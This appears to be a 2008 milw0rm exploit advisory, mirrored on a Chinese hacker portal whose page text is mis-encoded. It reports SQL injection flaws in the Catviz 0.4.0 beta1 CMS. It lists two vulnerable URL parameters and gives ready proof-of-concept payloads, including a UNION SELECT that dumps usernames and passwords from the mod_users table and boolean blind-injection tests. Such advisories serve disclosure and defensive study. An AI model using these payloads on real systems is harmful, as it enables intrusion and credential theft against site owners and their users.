| ÍøÕ¾Ê×Ò³ | ×ÊѶ | Hack | Â©¶´ | Íø¹Ü | ±à³Ì | Åàѵ | Æ·ºÚÒ³ | Èí¼þ | ÂÛ̳ | ¶¯»­ | ÊÓÆµ | ¾­µä | ½Ìѧվ | ºÚ¿Íµã¾¦ | 
Ãâ·Ñ·þÎñ ÎÒÒª·¢²¼ ÔÚÏßÆÆ½â ºÚ¿ÍÓÎÏ· ¾«»ªÊÕ¼¯ Ãâ·Ñ¿Õ¼ä ÍøÂçÓ²ÅÌ ¶À¼Ò±¨µÀ ºÚÆ÷µã²¥ Ãâ·Ñ FTP ½»»»×ÊÔ´
ÊÕ·Ñ·þÎñ ºÚ¿ÍÅàѵ ¹âÅ̼̿ ºÚ¿ÍÊé¼® ÊÓÆµÏÂÔØ Ö÷Á¦ÆµµÀ ¿Õ¼äÓòÃû ÍøÕ¾½¨Éè ÌØÉ«·þÎñ ½â¾ö·½°¸ ÎÒҪͶËß
ÄúÏÖÔÚµÄλÖ㺠»ªÏĺڿÍͬÃË >> Â©¶´ >> web apps >> ÕýÎÄ Óû§µÇ¼ ÐÂÓû§×¢²á
Catviz ¶à¸öÔ¶³ÌSQL×¢Èë           ¡ï¡ï¡ï ¡¾×ÖÌ壺С ´ó¡¿
Catviz 0.4.0 beta1 Multiple Remote SQL Injection Vulnerabilities
×÷Õߣºmilw0rm ÎÄÕÂÀ´Ô´£ºmilw0rm µã»÷Êý£º ¸üÐÂʱ¼ä£º2008-7-2
######################
#
#Catviz 0.4.0 beta1 SQL Injection Vulnerability
#
######################
#
#Bug by: h0yt3r
#
#Dork: n/a
#
#Homepage: catviz.sourceforge.net
#
##
###
##
#
#This CMS suffers from some not correctly verified variables which are used in SQL Querys.
#An Attacker can easily get sensitive information from the database by injecting unexpected SQL Querys.
#
#SQL Injection:
#http://[target]/[path]/index.php?module=news&news_op=form&form_name=article&form_action=show&foreign_key_value=[SQL]
#http://[target]/[path]/index.php?webpages_form=webpage_multi_edit&webpage=[SQL]
#
#PoC:
#index.php?module=news&news_op=form&form_name=article&form_action=show&foreign_key_value=10 union select 1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from mod_users/*
#index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=1
#index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=0
#
#
#You get "Go away you nasty intruder wannabe." when you do a wrong login...
#
#
#######################
#
#Greetz to thund3r, b!zZ!t, haZl0oh, WhiT€ $h@Dow, $h4d0wl33t, codeblu815, ramon, Free-Hack and Sys-Flaw and h4ck-y0u.
#
#
#######################
#######################

# milw0rm.com
ÔðÈα༭£ºÖìÙ»¡¡¡¡ÁªÏµ·½Ê½ ¡¡Email£ºÖìÙ»
µç»°£º51228163
  • ÉÏһƪ©¶´£º

  • ÏÂһƪ©¶´£º ûÓÐÁË
  • ×îÐÂhack¸üÐÂ
    ×îÐÂÍÆ¼ö×ÊѶ
    Ïà¹ØÂ©¶´
    ¶à¸öÔ¶³ÌSQL×¢Èë©¶´
    AShopÔ¶³ÌSQL×¢Èë©¶´
    pSysÔ¶³ÌSQL×¢Èë©¶´
    Ô¶³ÌSQL×¢Èë©¶´
    Joomla SQL×¢Èë©¶´
    JoomlaäSQL×¢Èë©¶´
    PHP SQL×¢Èë©¶´
    WebdevindoÔ¶³ÌSQL×¢Èë©¶´
    MamboäSQL×¢Èë©¶´
    MyPHPÔ¶³ÌSQL×¢Èë©¶´
    ×îлáÔ±Èí¼þ
    ×îÐÂÍÆ¼öÊÓÆµ
    ×îÐÂÍÆ¼ö¶¯»­

    Copyright @ 2005 77169.Net Inc. All rights reserved. »ªÏĺڿÍͬÃË °æÈ¨ËùÓÐ
    ±±¾©ÊеçÐÅͨÌá¹©ÍøÂç´ø¿í

    mailto:webmaster@77169.net
    ×ÉѯQQºÅ:836982 / 59280880
    ÁªÏµÕ¾³¤ QQ38588913
    ÈÈÏߵ绰£º 86-10-67634029/676229433
    ¾©ICPÖ¤041431ºÅ